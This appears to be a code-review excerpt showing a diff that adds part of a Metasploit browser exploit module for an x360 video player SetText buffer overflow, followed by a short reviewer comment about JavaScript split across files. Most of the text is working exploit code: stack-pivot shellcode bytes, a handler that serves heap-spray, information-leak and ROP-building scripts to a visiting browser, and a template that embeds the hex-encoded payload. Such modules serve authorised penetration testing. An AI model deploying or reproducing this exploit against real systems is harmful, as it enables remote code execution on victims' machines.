modules/exploits/windows/browser/x360_video_player_set_text_bof.rb

```diff
@@ -0,0 +1,148 @@
+    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
+    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
+    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
+
+    adjust
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    case request.uri
+    when /exploit.js/
+      print_status("Sending exploit.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, exploit_template(cli, target_info), headers)
+    when /sprayer.js/
+      print_status("Sending sprayer.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, sprayer_template(cli, target_info), headers)
+    when /informer.js/
+      print_status("Sending informer.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, informer_template(cli, target_info), headers)
+    when /rop_builder.js/
+      print_status("Sending rop_builder.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
+    else
+      print_status("Sending main.html...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
+      send_exploit_html(cli, main_template(cli, target_info), headers)
+    end
+  end
+
+  def main_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
+    f = File.new(path, 'rb')
+    template = f.read
+    f.close
+
+    return template, binding()
+  end
+
+  def exploit_template(cli, target_info)
+    shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
+
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def sprayer_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def informer_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def rop_builder_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def strip_comments(input)
```

Comment:
Already discussed with @wchen-r7, for the record: the thing is which JS is split in several files. We need to reference classes and its methods from other files.